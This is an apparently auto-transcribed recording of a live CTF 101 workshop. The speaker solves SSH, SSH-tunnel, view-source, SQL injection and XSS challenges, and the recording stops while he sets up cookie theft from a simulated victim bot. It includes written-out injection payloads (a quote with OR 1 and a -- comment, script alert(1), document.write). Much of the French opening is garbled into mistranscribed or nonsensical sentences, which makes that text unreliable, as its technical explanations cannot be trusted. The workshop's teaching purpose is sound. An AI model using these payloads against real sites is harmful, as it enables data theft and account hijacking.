 Non. Fait qu'arrêter de dire des conneries à partir de maintenant. Olivier devra arriver dans pas long. Florentia, je pense qu'elle a pensé qu'elle parlait à toi sur Discord, mais c'était pas toi. Ça peut être bien mélangeant. Le top nail à date, c'est juste à face. Tu vas devenir une star. Ouais, c'est ça. J'ai hâte de mettre un meilleur background que si tu as la ballaire dans un palace ou quelque chose. Encore le temps. Fait que je vais te mettre host. T'es maintenant host. You have all the power. Moi. J'attends que... Olivier arrive... Ah ben, dans le fond. Non, je peux plus rien faire. C'est toi quel pouvoir. Tu le mets trop host. Est-ce que tu as les droits de ma déraction dans Discord? Je pense qu'il ne me les laisse pas parce que je n'ai pas tout effet. Tu peux tu l'activer. J'ai du besoin de quelque chose, je pourrais faire ce quick. Je vais monitor votre chat, no worries. Il faudrait juste créer un channel texte pour... Il y a déjà fait. Fait que si je peux répondre au message, mais c'est vrai que je ne pourrais pas genre de rate. Mais je peux le faire. Ok, si tu peux le faire, c'est très good. Si il y a vraiment quelque chose à faire, je te dirai. Je vais essayer de m'en occuper. Bilodeau, il est dans le waiting room. Tu peux le admettre. Salut salut. Camera 2. Le petit caméra, c'est tout. C'est la cam de la job, ce n'est pas ma bonne cam. Pour le jour perdu, je n'en ai pas encore ma jambe. Salut Colin, merci d'être là. Pas trop, c'est plaisir. Je vais vouloir que tu checkes... Ce que je vais avoir de l'amuseur à checker, c'est Discord pas le channel CTF Loat, de workshop général. Parce que dans le fond, on le montre sur YouTube, on n'a pas le channel de workshop CTF. Je vais vouloir que tu checkes ça. Le Slack aussi, je ne pense pas checker Slack pendant toute le staff. Si jamais tu crois la tissu, tu m'avertis. Juste pour ne pas que tu sois surpris, dans le fond, la formule, il n'y a pas de slide. C'est moi qui salve 12 challenges en 3 heures. C'est pas dur, je me suis pratiqué tantôt. Je vais lentement, j'explique, je donne beaucoup de détails sur la théorie, les commandes en arrière des affaires et tout. Je vais essayer de time-tracker et peut-être aller plus vite à certains endroits, selon, mais je vais partir vraiment slow, parce que j'ai quand même beaucoup de temps. Et des affaires qui sont vraiment faciles. Tu connais les durées. Je suis pas sûr que j'ai accès à Slack. Sur ce truc-là, je vais checker 2 minutes. Je pense pas qu'on reçoive rien. Le Slack, c'est celle de notre site, l'organisation. Dans le fond, Hugo, t'es-tu là? Si jamais il y a de quoi... Arrangez-vous pour que ça sorte sur Discord dans le fond, parce que c'est ça, Slack, je ne check pas. Oui, c'est bon. Là, je vais essayer d'écrire et de ne pas liker mes Fnites et tout, mais c'est dur. Et puis, c'est plus là, tu pourrais-tu, Colin, mettre Olivier comme crowd, juste pour être sûr. Là, je vais commencer à partager mon écran. Oui, je me soumets en 1080p pour ça. Le Warshark, c'est pas ça que je veux faire. Ça, c'est un peu gossant. Je vais le voir en Chromium. Ah, pourquoi j'attrape tout le temps si tu n'es pas tant là? Ça, OK. C'est pas là. Non, je ne mets pas le Scream. Puis, mettons... Ça aussi, je peux fermer ça. Puis là, si je fais ça, parfait. Je pense que je suis prêt. Le Scream est starté. Il est unlisted, mais vous avez commencé à avoir des gens sur le Scream. Cool. Fantastic. Là, tu vas rentrer le monde aussi. Je voulais participer à monter. Ah non, OK. On peut faire admit all. Ouais, toi, je n'ai pas mis tout de suite. Il faudrait que je fasse assurer si tu es prêt. Oui, j'ai l'air pas parti. Il y a le... Le bonus que je ne suis pas fière de mon explication, mais je ne me rendrai peut-être pas. Ça va dépendre du temps. Mais le reste, c'est ça. C'est exploit, oui. Il y a du bruit. Si je tombe sur le poche. Il fait vraiment beau, si c'était Nordicic en personne, Word. Ouais, beau beau Ottawa. Oui. Ça ne est pas chiant. Ah merde, c'est encore dans le sang, dans l'Ordin verse. Wesh. Wow. Comment est-il Jean Julien? C'est où qui m'a envoyé ça? Qui baisse. Ça c'est bon. Je vais envoyer un message. Oh, j'ai pas fais ce message Où suis-tu? Non, je cours. Oh non, il faut que je pèse pour voir le chat. Comment ça marche? Chat! Voilà. Ok. Everyone, I'm waiting room. Ok. Hey, à chaque fois que ça pop ça, ça va être drôle. Sérieux? C'est fucking gosse. Ok, je pense que quand on va recommencer, peut-être ça va être moins pire. Hey, on va fermer ça. Sérieux, la barre à gosse, là? C'est bizarre. J'ai fait un meeting Zoom mardi, puis je n'avais pas les mêmes options, puis c'était la licence d'RSA conference, ça ressemble. C'était sur Zoom. Ouais, c'est bizarre. Peut-être que tu n'étais pas co-host, sinon je ne sais pas. Oui, j'étais co-host pour pouvoir partager mon écran. En tout cas, pas pas grave. Ah oui, aussi Colin, un autre affaire. Des fois, quand j'ai des fenêtres une par-dessus l'autre, il se met à avoir des glitchs dans mon affichage. Si jamais ça arrive, dis-moi, j'ai un workaround, si je m'en vais dans une fenêtre qui n'a rien, ça ne le fait pas. Si c'est le genre, c'est quand j'attends peut-être un browser puis un autre affaire où j'en vais au workshop, souvent c'est mon terminal qui sort comme à travers la fenêtre de d'autres choses. Tu fais juste comme un new talk et il fait juste mal dure. Puis aussi, je me souviens, mais on ne voit pas le chat par ton écran. Oui, je sais, c'est cool ça quand même. C'est spécial, c'est bien fait. Elle a mis dans workshop ma sœur. On est déjà live, ça va dire. C'est stressant. Am I spotlight? Oui, je ne pense pas que tu aies le spotlight, mais depuis que tu écoutes ton écran, je pense que automatiquement ce qu'ils voient c'est que c'est seulement ton écran. Oh oui, les fenêtres sont sorties, c'est bizarre. Ce n'est pas pourquoi je ne l'ai pas attendu. Ok, tout le monde. Si vous voulez, je peux laisser tout le monde en. Oui, s'il vous plaît. Oui, c'est ça. J'espère que le bar Glitch va disparaître quand on commence à admettre les gens. Faites le temps. Oh, vous avez admissé tout le monde. Bon, vous devez le faire un peu de temps. C'est à 6 p.m. On va commencer, je pense. Bonjour, tout le monde. Je vais le faire. Tout le monde doit se joindre au CTF 1-on-1.insect.io. Je vais le envoyer dans la chatte. Tout le monde dans la meeting. C'est ce que nous allons faire aujourd'hui. Nous allons faire un play-through. Il y a beaucoup de difficultés. Si vous n'avez pas envie de me entendre, n'hésitez pas à faire ça. Tout ce qu'il faut faire, c'est que vous soyez en train d'améliorer le challenge. J'advise que vous commencez de la basse et que vous travaillez de toute façon. Donc, on va commencer par l'assistement, parce que vous allez avoir un système que vous utilisez dans le webtrack. Et puis forensic, et puis reverse engineering, mais c'est pas dur. Le problème du truc, c'est que les gens en plus sont tout le monde. En Chrome, tout le monde a utilisé le console de développeur. Mais pas nécessairement. Tout le monde a ouvert le binary dans la guide-reuse. C'est pourquoi nous nous restons pour le dessert. Et il y a des préparations de taxes et des expériences d'exploitation. On ne peut pas le faire, on ne peut pas le faire. Ça dépend d'où on est successement. On se plait ensemble. Encore une fois, la façon dont ça va fonctionner, certains d'entre vous ont déjà commencé. Cette fois-ci, j'ai décidé, je vais garder les scores à l'entrée. Tout le monde peut jouer. Ce que je vais faire, c'est que je vais pouvoir faire tous ces trucs. Et je vais donner beaucoup de théories, beaucoup d'explanations pour que vous puissiez construire une compréhension du processus de pensée, ou des défis simples. Et j'espère que quand vous facez un plus difficile, vous avez les bases que vous pourrez avoir, au moins, un petit hook, ou un peu d'assistance. Et le sissin est vraiment juste la base de ce que vous avez besoin pour comprendre pour accéder à ce système. À Nord 6, c'est IPv6, donc c'est un peu plus difficile. Mais c'est quelque chose qui est nécessaire, poursuivant, pour comprendre que l'excess payload, souvent, vous avez besoin d'un service host afin de poursuivre le payload, avant de commencer sur le premier challenge, je voulais juste dire que pour CTF, tout le monde a besoin d'une muse, donc vous avez besoin d'une chose qui vous inspire ou quelque chose qui vous va vous faire engager. Et pour nous, nous avons commencé avec des habits très mauvaises, notre muse était un alcohol. Donc, ce que j'ai appris dans les années, c'est qu'il n'y a pas de quantité, donc ce que nous allons tenter d'achever ici, c'est d'obtenir la pique de Ballmer ou de maintenir la pique de Ballmer donc je vais vous montrer ce que j'ai appris pour la pique de Ballmer pour CTF. C'est très important parce que la productivité est en place à un niveau spécifique et j'ai un très fort IPA donc on va aller smooth et vous savez, à un moment pour nous donner la possibilité de trouver votre propre muse, pas parce que c'est la main mais c'est celle de la partie d'adresse, donc ça peut être beaucoup d'autres choses, mais vous devez être en train de garder la main c'est pas possible pour vous, J'étais en train de faire ça et on y va. Le premier challenge, SSH. OK, 10 solvages déjà, donc 10 gens sont plus vite que moi ici. La possibilité d'utiliser le SSH est un skill important pour le CTF player et quelqu'un dans le secteur de sécurité. Donc, ça devrait être très straight forward. On va faire le workshop CTF 101. On va détruire tout ce que j'ai ici pour que nous puissions commencer par scratch. Mais là, on y va. Peut-je faire ça plus grand? J'ai des profiles pour ça. C'est peut-être un peu trop grand. Je pense que tout le monde qui est sur son computer c'est mieux de le présenter qu'en personne, où c'est sur un écran. Mais je vais encore aller avec la présentation en cas que quelqu'un regarde ça sur leur télévision. Maintenant, nous avons l'accès à deux files et nous avons un bon hint. Donc, port 2222, hostname. On va downloader le keypair. Mon petit folder que j'ai ici. Donc, on va laitre ça avec le nom de la track, sessentment, et ensuite on va downloader le keypair. Nous avons des instructions. Donc, hostname, un nom spécifique, let's copy it. User et port. Donc, pour SSH, vous savez, l'aide peut toujours l'aide, mais on peut utiliser le texte suivant. Donc, c'est user et app. Et puis, depuis SSH c'est un protocole, c'est très important de retirer l'HTP, columnes, etc. C'est... Ce que nous connectons, c'est le hostname ctf101.io. Et pour cela, nous avons spécifié le port. Donc, nous devons faire un dashp 2222 afin de spécifier le port. Et donc, ce que SSH fait, c'est qu'il combine plusieurs canaux qui sont utiles afin de faire des interactions network et d'avoir accès à la TTY, l'environnement terminale, d'un système remote. Donc, maintenant, nous utilisons juste le basic. Je veux obtenir un terminal sur ce host pour s'assurer avec cet utilisateur. Et le quai que nous avons downloadé est quelque chose, quelque secret qui a été créé par le service administrateur qu'il a envoyé pour nous. Donc, cela prévient l'utilisation du passeport. Et depuis qu'il y a des quai, vous savez, nos files, ils apparaissent beaucoup plus d'entrepés, beaucoup plus de randomes que d'habitude des passports. Et c'est aussi une bonne mesure parce que les utilisateurs peuvent créer des passports qui peuvent être bruts de force. Mais quand vous enforcez le quai de login, vous vous avez basicement évoqué la barre. Vous aviez les utilisateurs en s'assettant sur quelque chose simple. Maintenant, je vais légèrement ne pas utiliser un quai et nous verrons ce qui se passe ici. Donc, oops, j'ai déjà connecté à ce qu'il y ait et il y avait un autre IP ou un autre quai. Donc, nous allons juste se faire rire de cela. Commençons de nouveau. Donc, la façon dont j'ai configuré c'est que j'ai toujours printé ce quai, un quai visuel, juste pour que j'aille me rapprocher que c'est le même quai que ce n'était pas compromis. C'est un setting que j'ai copyé probablement par Pierre David ou quelqu'un comme ça que j'ai créé, mais vous ne verrez pas après la première connexion, je pense, mais pour moi, c'est sur chaque connexion. Pour être honnête, ce n'est pas assez utile. Donc, depuis que je n'ai pas specify le quai, il s'est demandé pour un password dont je n'ai pas. Donc, je ne peux pas connecter. Maintenant, comment j'ai specifié le quai par utiliser un quai et puis je vais spécifier le quai par ici et avec ça, maintenant, nous, oh, nous avons un autre erreur. Comment je n'ai pas obtenu l'autre erreur? All right. Donc, ça dit, votre quai privée est mal protégée, donc protégée afin de pouvoir connecter. Right. Et la permission 0644 est trop open. Donc, nous devons appliquer différentes permissions. Donc, nous voulons voir la permission de l'application que j'ai juste downloadé avec ls.shell. Donc, ok, bien sûr, le file est le monde readable. Right. Le dash, le r, ça veut dire que tout le monde peut lire cet application sur mon système dont le ssh n'aime pas ou ne veut pas que vous soyez comportés comme ça. Donc, je vais vous montrer l'utilisation symbolique de la permission. Je sais que beaucoup de geek en dehors sont prêts de la facture qu'ils savent par coeur ces bits de permission de l'optimisme. Mais, je ne sais pas. Et je pense que le monde serait mieux si vous n'avez pas à vous rappeler de quelque chose comme ça. Donc, on va le faire symboliquement et c'est un peu méchant le syntaxe. Donc, ce que nous allons faire c'est de faire un peu de l'application donc, ce que nous allons faire c'est que nous voulons dire que l'utilisateur va avoir des accesses les groupes et d'autres n'ont pas d'accesses. Donc, on met u dash rw et g o donc, des groupes et d'autres avec n'ont pas d'accesses à tout. Et on appuie ceci pour le file ssh et avec ceci je dois j'ai utilisé donc j'ai utilisé ceci pour changer l'ownership au lieu de schmoud donc, bien sûr u equals rw n'est pas d'utilisateur merci maintenant c'est mieux si on regarde le file maintenant les permissions sont quelque chose que seulement mon utilisateur a d'accesses et les permissions groupes pourraient d'arguer d'être frère depuis que je suis le groupe le groupe est le nom second que vous voyez ici mais je ne pense que ssh et forces ou ou des checks pour ça donc juste utilise le le truc ici et vous allez bien donc on va essayer encore donc on l'a connecté on l'a connecté sur un système appelé pivot box et à n'importe quel moment que vous soyez un flag ou que vous abaissez une spécifique vous follow une spécifique challenge vous avez toujours besoin de vous voir donc où est-je qu'est-ce que sont les files locales j'ai un flag.txt ok ça semble comme quelque chose que j'aimerais lire et donc si vous coupez le flag vous avez un message disant congrès apprendre à utiliser ssh et ssh keys c'est un très important skill donc let's copy ça et voir si on a le droit et si ça a fonctionné et c'est le quai et le format ici pour les gens qui sont sur les windows et veulent utiliser poudi mais je ne vais pas le voir de cette manière je trouve que ce que nous allons faire plus tard le le c'est plus compliqué avec poudi et aussi le file transfers sont plus difficiles à faire ils n'ont pas aussi straightforward comme scp nous ne allons pas faire les transferts de file aujourd'hui mais vous vous ne pouvez ne pas que ssh aussi soutient les channels de file transferts qui sont très utiles donc nous sommes corrects nous avons fait notre première solution d'aller en train de bouger pour oh nous pouvons réagir le sifflet en train de bouger deux tunnels de ssh donc de la machine de pivots de pivots vous pouvez atteindre un service qui s'exprime un secret d'ailleurs pivots pivots ont laissé beaucoup de tools comme nc ou socap peut-être nous devons utiliser un tunnel de ssh pour atteindre ce service donc ici je veux je veux faire un petit quelque chose parce que je suis professeur au coeur donc c'est nous c'est pivots et c'est le service de ssh attendez un peu oui ok oui donc pivots service je ne peux pas je suis pas en utilisant un diagramme programme donc ça va s'assurer comme ça un petit peu hop la première fois j'ai activé ce tool c'est slow j'ai trop de fonds ou j'ai oh non c'est ma sélection j'ai besoin de sélection toutes les choses et puis j'ai un service ok donc le ce qui est dit dans cette description est que on ne va pas pouvoir connecter à ce service directement ce n'est pas possible ce n'est pas exposé sur l'internet donc ce qu'on doit faire est qu'on doit trouver un moyen et par le fait il y a beaucoup de moyens pour résoudre ce challenge mais l'apprentissage que je veux que vous obtenez est euh est ssh tunnels donc le ce que nous allons faire est créer ce tunnel et c'est c'est très important pour comprendre ce qui se passe quand vous créez un tunnel ssh basicement c'est un tunnel virtual qui va je devrais je devrais probablement faire ça par la la box et puis on arrive à la place d'aujourd'hui et vous pouvez faire un tunnel forward et un tunnel reverse c'est différent et c'est important pour comprendre la différence vous pouvez vous pouvez échapper beaucoup de différents networks de configuration avec ssh c'est incroyable mais donc à la à la base de l'air à la phase de l'air vous encore vous avez une connexion tcp ici et puis un ici ce qui va arriver c'est à l'air à l'air système et ceci est créé sur le vol ce n'est pas fait toujours sur mais donc on va dire tcp tcp up mais donc à l'intérieur de cette l'air c'est où ça se passe à l'intérieur de cette ssh tcp connexion sur port 222 est cette capacité ce tunnel créé entre les deux différents systèmes et donc ici nous sommes nous voulons atteindre un service sur port 5555 donc on va on va piquer ici on va pluger notre tunnel en 25555 et donc alors ce qu'on spécifie ici comme comme listening destination et ça peut être un host différent donc c'est important encore pour comprendre vous savez les meilleures possibilités d'une ssh tunnel mais donc vous avez à spécifier où c'est et quand on envoie dans l'air donc c'est juste c'est juste c'est juste que cette source de tunnel peut être spécifiée et quand on envoie le packet dans ça ça va automatiquement apparaître ici sur le 55555 ok donc avec cette théorie et la main on ne va pas suivre aucun conseil et un essai de ici pour connecter à un service c'est-à-dire un service ok donc ping un service ça marche on n'a pas de ping c'est-à-dire c'est-à-dire que nous c'est le cas et si on regarde c'est pas là c'est pas là ok ce système était très restricé bien sûr il y a Python donc vous pouvez probablement faire une ligne et Python et faire ça mais ce n'est pas la purpose ici donc on va on va on va bâtir le bilan et créer ce tunnel donc je vais vous montrer deux manes de faire je vais vous montrer la la la ligne commune et puis je vais vous montrer la façon de config parce que c'est c'est-à-dire pour pouvoir utiliser la configuration afin de faire ça parce que vous n'avez pas à répéter les mêmes commandes sur et sur donc ok savoir ce que nous avons vu nous serons nous devons mentalement remercier ce commande pour toujours donc le tunnel c'est-à-dire capital L ok et nous spécouvons quel host on veut atteindre sur l'autre end et le le port ok ce qui est impliqué dans ici ok nous allons juste prendre un look à la ssh output donc c'est l'adresse donc nous allons ensuite regarder la page avec capital L et ok donc nous avons ici un port host et host port et nous nous pouvons spécifier un adresse de bain ok on a port et un sac à remercier et des sacs locaux aussi donc des sacs locaux j'ai l'assumé que c'est des sacs files mais je ne suis pas sûr peut-être que c'est l'existence des sacs nommés mais ce que nous allons focus sur est cet homme ici donc host port host c'est-à-dire la autre façon la autre façon et c'est ce qui est important d'en souvenir quand vous faites ce c'est-à-dire commande L c'est-à-dire que votre ssh vous êtes encore que c'est-à-dire c'est-à-dire pour ce vous faites encore ce ssh pour ce système ce système vous permet de faire le tunnel donc vous ne changez pas votre régulière argument ssh c'est-à-dire un trappement que beaucoup de nouveaux port-forwardeurs sont tombés mais donc host host port est dans la commande L et puis local port ou port et ce que c'est une autre chose qu'on ne veut pas utiliser mais que ça existe et que ça peut être fun est acheter un adresse donc vous pouvez si vous avez plusieurs IPs sur votre machine acheter un autre adresse et vous pouvez acheter un adresse qui signifie que ça expose le tunnel à d'autres systèmes par default ils vont acheter un local host donc si vous travaillez dans une équipe et vous faites le tunnel et vous voulez d'autres pour connecter vous pouvez toujours utiliser une stratégie comme ça mais donc maintenant avec ce en mind nous allons faire ce système ce service et sur notre système nous allons utiliser la même porte juste mentalement plus facile et puis connecter ce système et le service et nous allons voir ce que ça fait donc un autre intérieur intérieur en fait de créer ce tunnel c'est ça par default c'est c'est une connexion ssh une connexion régulière de la connexion ssh mais derrière les scènes le tunnel existe donc nous pouvons penser que c'est faillé ou quelque chose ne fonctionne mais c'est c'est c'est c'est c'est c'est si on a un autre chel et nous on avec netcat localhost je pense que je pouvais utiliser les noms et puis 5555 nous nous avons le tunnel en travaillant c'est nous nous nous nous avons juste netcat query sur localhost 5555 mais il est par la boxe de pivot et il a atteint ce 5555 sur l'autre côté et nous avons le flag maintenant il y a des commandes ou des switches de ssh pour prévenir obtenir ce chel signer que ce ssh ne devrait pas être utilisé pour l'interaction tty juste pour le port forward cela existe je pense que c'est dash n lowercase n et je n'ai pas l'air de coeur mais un autre cool truc je veux vous montrer c'est dans le sisson et je vais vous montrer comment faire un file config je vais pouvoir le dire je n'ai pas refusé cette partie capital f config file c'est ça ok on va essayer donc ce que je vais faire est maintenant est de créer un file config donc on va le dire la boxe de pivot et puis le nom de host je devrais refuser cela c'est l'identité file et puis on pourrait utiliser c'est le paire de ssh ce et puis l'utilisateur est l'utilisateur le nom de host est ctf101.insect.io et puis le paire est ok on va juste essayer ceci donc si je fais ssh config la boxe de pivot ça ne marche pas trop beaucoup d'attentions et pourquoi est-ce que c'est tous mes clés oh mon Dieu tant de clés pourquoi n'est-ce pas ça ne marche est-ce que peut-être parce que le nom de file n'est pas fausse essayer ça je ne vais pas prendre trop de temps sur ça ou est-ce que c'est close mais c'est ça donc vous pouvez lire sur le ssh config par doing a man ssh underscore config et donc host c'est correct identité file pour le path ça devrait être correct ok alors alors que c'était un bonheur je pense que je vais bouger mais ce que j'ai voulu pour montrer ici c'est que vous pouvez aussi plutôt que le dash i le dash capital L pour le port forward vous pouvez utiliser une spécification locale pour la spécification et donc ça vous permet pour pour faire votre port forwarding dans une dans une fashion constante et donc vous utilisez le même syntaxe comme régulièrement et la raison que je fais ça dans un file séparé c'est que je ne veux pas ouvrir mon ssh config mon personnel ssh config sur le stream et sur Youtube parce que c'est un bonheur de hosts que je ne veux pas les gens d'être donc c'est pourquoi mais je pense que il y a probablement un fallback qui affecte ce dans mon config et en spécifiant juste ce que ça fait mais donc le local forward est c'est bien parce que c'est un truc de self-document et vous pouvez vous pouvez mettre beaucoup de ceux dans un commande single donc c'est un bonheur pour document et c'est facile à partager pour vous vous pouvez juste partager le config et les gens peuvent connecter donc je vais utiliser ça plus et plus pour pour les gens pour pouvoir connecter à je pense que quelqu'un a bloqué le serveur est-ce possible non non non non non non non c'est parce que j'ai utilisé le bonheur ok sorry pour ça le bonheur j'ai j'ai switch folder et j'ai j'ai utilisé le bonheur ok donc je vais graber cette flag c'est le même que j'ai fait avant parce que j'ai voulu parce que j'ai voulu des points mais le config s'est utilisé l'advice s'est utilisé c'est un très bon moyen d'en souvenir comment utiliser comment vous vous souvenez et juste le papier configs autour sans avoir à commencer de scratch donc ici on y va on a quelqu'un qui dit qu'il ne peut pas faire le tunnel tu veux tu veux on peut où est-ce que t'es tu peux rencontrer username on peut peut-être mouler toi je peux mouler moi-même oh même mieux oui donc le set-up est Windows avec un UBUN 2 WSL je peux assister à utiliser Windows mais pas le tunnel et sur UBUN 2 il est encore complémenté sur les permissions t'es-tu ok donc les permissions je ne suis pas sûr comment fixer avec le WSL je n'ai jamais utilisé WSL mais c'est le schmarre le truc que j'ai parlé devrait travailler non schmarre schmarre même avec sudo il me dit je n'ai pas la permission tu n'as pas la permission de modifier le file yep pas d'idée donc je l'ai fait dans Windows le file doit être dans le système de file de Windows de WSL sinon si c'est sur comme le système de file de Windows les permissions ne fonctionnent pas les mêmes donc si j'ai check les permissions dans WSL le file est de la suite donc on a d'autres questions donc le file ne devrait pas être de la suite et il ne devrait pas j'ai j'ai malheureusement je ne peux pas m'aider avec WSL je n'ai pas d'idée de comment ça marche mais mais SSH va compléter si le file est broadly available et est-ce que tu dois fixer ça de WSL ou de Linux dans WSL Unfortunately je ne sais pas ce qu'on va faire ici c'est que on va avoir des gens qui ont fait le travail dans WSL mentionner dans le chat soit dans le le discord la chaîne principale workshop ou dans le CTF 1 on 1 channel si quelqu'un peut faire ça, s'il te plaît ça serait bien sinon on peut regarder après après qu'on soit fait avec les autres challenges Sorry about that ok donc Moving on with the web challenge so this one is use the source Luke Right it's a pun that has been made and countless capture the flags before and the idea here is you need to know how to poke behind web page and see the source and it's gonna be fairly straightforward but first the rewards oh there's there's one important thing about the SSH make sure that you can see it so for example notice how I moved around in the file system to make sure that the file was local right was near where I run the command so for example if I do this here the file is local in my current directory that's good if I run a stage from here the file is not here is not in my local directory it's in the system and folder so what I need to do then is to put the full path to the system and folder and this might be one of the issues with WSL not sure all right so to the source on the web challenge you can see that you can log it's a login page but and this is a good reason why you need to pay attention to challenge the description and every year we catch people with stuff like that the description of the challenge gave a very strong hint because otherwise you would you could try to do SQL injection right here right and you know get a login fail and then say oh it's probably blind SQL injection and then just go crazy trying to solve this with SQL injection whereas the description said use the source so you often time if you've been hurting yourself on a challenge for an hour or something like that take a step back you know breathe talk about the challenge to someone but make sure to to get perspective on it and and reread the description maybe there's a there's something you you didn't quite get and and oftentimes you know the when you explain it to someone then you'll have you might not find the solution but at least you'll have ideas like oh I didn't try that and and you this happened countless times right so but now having reread that description use the source we could use the view source button or the inspect view both actually work this one actually leads quite straight to okay to do disable the support account and then after all the form you get if you if needed support account is support welcome to so we're gonna try that and many of the harder challenge have elements like that so even though this is not the super crazy web challenge a few of them including past north sec ones have these stages right where you oh you would get something out of this or access to a page you shouldn't have access to stuff like that also note that one of the the CTF I played in they used this very similar trick but they put a bunch of new lines and now now chrome has the line numbers but it there used to be a time where they didn't or it will open a notepad and you would basically have 5000 empty lines and then at the end you would have a comment like that you know this is CTF this is not the reality they can do stuff like that to mess with your head and this doesn't necessarily makes it a bad challenge it's just you know use your brain and one of the way of picking it up was that there was a scroll bar you would you would see a scroll bar on the on the right okay up hidden account activated here's your flag we're doing good okay sql now more we're gradually approaching harder and harder challenges so sql what what what what what is this page what does it do let's let's just run a test oh nice they do output the sql that was executed how kind of them but uh keep in mind that even if if it's not the case when you approach an sql injection challenge you need to think like that and you you even should in in the harder cases deploy uh my sql or as soon as you know what they are using deploy one locally and play with it try like the commas and stuff like that that the the reason is you'll get the error message you'll be able to go quicker iterate quicker on different inputs and see what does an error what what is you'll see also if there is something in between at the application level that filters character or if it's the database layer that does that so it's uh it's very important to be very methodic about sql injections also you know solving them with a tool is kind of rare in CTFs it it it it can be done and it happens still but most of the time you know they will make sure that the tools don't work so so going by hand and methodically is often better so let's assume we're we're we're you know not too sure so we'll do like the okay Bobby tables or one equals one oh we get something someone put in or one equals one in the database to just troll us that's not kind okay now let's look at the query like percent or one equals one percent we probably okay so percent clearly does something special here so let's say we put one equal aha we get two results so this clearly acts as a wildcard and many programmers already knew this but so you have a wildcard but it was started with a double quote so can we do another double quote let's see we're crashing the php application so that's not good so we need to find a way that the that the query will still be valid SQL one of the common tricks is let's do oh we can we could search for flag as well I forgot we should have done that flag nice try okay so let okay let's then do flag and then close the quote but not having crash so we did flag close the quote it crashed what could we do we could do we could continue the SQL query and this is where you get these or one equal one type deal and the goal being to short circuit the Boolean logic that a false will be orred will be checked against a true and so the true will win and you will get all the results that's the idea of the or one's one equal one another way that we could terminate that query properly is to comment the rest of the of the line and the SQL language has comments and in many flavors again important to check your database and fingerprint it and and understand what is going on but doing this space dash dash is one of the common ones there's also semicolumn dash dash or stuff like that semicolumn space and I know that the spaces are important in for some databases so what we have here is it worked right we didn't get the flag but we had valid SQL so that's great and we can see that it attended a person and a double quote which should have failed the parser of the query but it was commented out so that the dash dash did work as a comment now now that we've built this let's apply this Boolean logic so what we want is we want something false or something through one is always true and then do a search and boom we drop the whole table by doing this double quote or one and then comment after the and comment the rest of the query so the query is valid and you can see that the challenge designer played with us a little bit because they use non-asci characters here and even in the description they're using this unico the flag fancy format and you know the north sec challenge designers are world renowned trolls so you can expect something like this going on so there are other ways to solve that challenge many other ways and so i'm gonna show you one that is fun and this was discovered as i was presenting it so if let's do test again so if this person is a wild card and test then nothing prevents us for doing from submitting a wild card so it could be wild card wild card wild card does that work yes it does so you can you know dump everything like that as simple as that there are oftentimes unintended ways of extracting flags doing you know finding ways around like this now another maybe do we have another one no because we're so the items it's the name column that is has a like so we need to we could have find maybe the J character or something like that but for our and 10 purposes let's move on to the next challenge which is XSS so XSS XSS is i think i think for people younger than me easy to grasp but i remember first time i was exposed to XSS i was really confused and i was like they're not attacking my server they're not executing code in my server context how is this a problem for me well the thing is the problem is not necessarily for you but it's for your users which are getting their secrets stolen so oh my god can i really get into XSS okay so html oops i'm not read let's let's be gentle so an html page is a mix of html so yeah let's let's let's write it so it's a mix of html and code with javascript and that code has access to the uh many of the of the secrets stored in the browser so browser browser secrets okay so that code can access stuff like here right and cookies are the you know the top browser secret and if you can access the cookies of a user basically you can copy or impersonate that user so that's pretty bad and you can also with javascript generate other requests to other web pages you know here we go so this is pretty powerful and dangerous it's probably you know the web's biggest mistake but uh but at the same time how could it have how could it have worked any other way i don't know it's it's difficult to be uh to talk about the past like that but we're stuck with that and what is XSS is basically a way with user input uh to mix the two together so what should have been html uh the user submitted javascript instead and this is where diagram gets messy but the user submitted javascript instead and so code is executed but at the at the root cause is badly uh sanitized user input so root cause okay so if we take this into our example with that it's a search box okay so we're gonna search for flag i search for flag no flag ah damn it i'm gonna reread the description can you XSS yourself important your payload must return i don't want all right so oh this is user input yes and this is html so this user input is returned by the server and is now page content in the html context okay interesting is there any filtering happening can we do pure html injection or uh entities injection html entities injections okay so you see this this i i submitted html ballys anchors html entities uh and they were reflected on the page and uh now i see that the bold is there so let's get back to what is javascript javascript is code in the browser with the html so how could i generate such code we can try by using script and then uh let's let's do a benign payload a non alert payload let's not go straight to the answer so document went right can we can does that such a method exist thanks so yeah document went right okay let's try that so are we really executing code in that context or is Olivier messing with us right so document went right and uh let's put cuckoo or not cuckoo it's too french hello and then let's let's save it up oh you search for hello so what happened here this was written like hello but what do we have in the page ah we have a script that said right hello interesting so it means that here we could this we could have this browser when though request stuff from other servers and of course there is the cross origin policy cross origin same origin policy that prevents many of attacks and that mitigated the worst the biggest problem of excess but we're still executing javascript and now you know it's all about imagination and and having it exfiltrate or do our bad bidding and various ways but the the point is or I hope you understood what what xss is and and why it's dangerous now we're gonna do this flag and then the next flag we're gonna we're gonna crank it up a little bit on the xss because uh self excess like this is is almost never a ctf challenge but uh you'll see the next type of xss is so your payload must contain other one so let's do that now again script alert one and then script and oh I get a pop-up so the code executed in the browser I get the one and congratulations you xss yourself I have the flag I'm just gonna open the window one or is it warmer outside I don't know to be honest maybe I'm making a mistake okay so this is solved let's move on to xss larry so can oh let's take the sip of victory so here we're dealing with a different type of xss six solved already that's cool so larry the clicker so we have a url to look at let's close this and this okay same search box excellent we can submit urls for larry so basically who is larry the clicker larry is someone to who you send urls and he clicks on it that's cool so our goal is to try let's open larry the clicker please give me a url and I will visit it excellent so the goal is to steal the browser cookies from this domain from larry so basically larry has a secret in his browser cookies for this we will need an accessible web server because and and this is another very important concept of xss is that you're executing code in the browser of the victim so wherever larry is if you want to put code that will exfiltrate the that that will send the secret somewhere it needs to be reachable so it cannot be your local machine so you know for for CTFs you often need a box somewhere that is easily accessible and pro tip and maybe I shouldn't say this but north sec is ipv6 only so maybe you should get ipv6 reachable hosts on the internet we do I think have NAT64 capabilities but these rely on dns so if you don't have a dns associated with your your your ipv4 you're gonna you're gonna have problem reaching your server so always do a straightforward test before going into more convoluted things because in north sec we like it hard so everything is ipv6 and you know it's 2021 people were saying ipv6 was dead in 2014 I think even maybe earlier than that okay so we can use pivot box for that so we'll go get on that server and that server is reachable from the internet or at least from xss from larry the clicker and so if we have this in the payload it will we will we will see it in our logs but first okay the thing is we are giving a url to larry so the method that we need to use here is okay cool but it means that I should be able to access myself but only using a url and send this to a local server so this should work so that's how we're gonna build the payload so so first is that's probably what we're interested is in let's run this and uh we don't see anything maybe we don't have cookies let's try can we okay is there a cookie management here cookie we do have a cookie session cookie non maybe not for this did this work oh or maybe come on and let's try that maybe no cookie okay no cookie 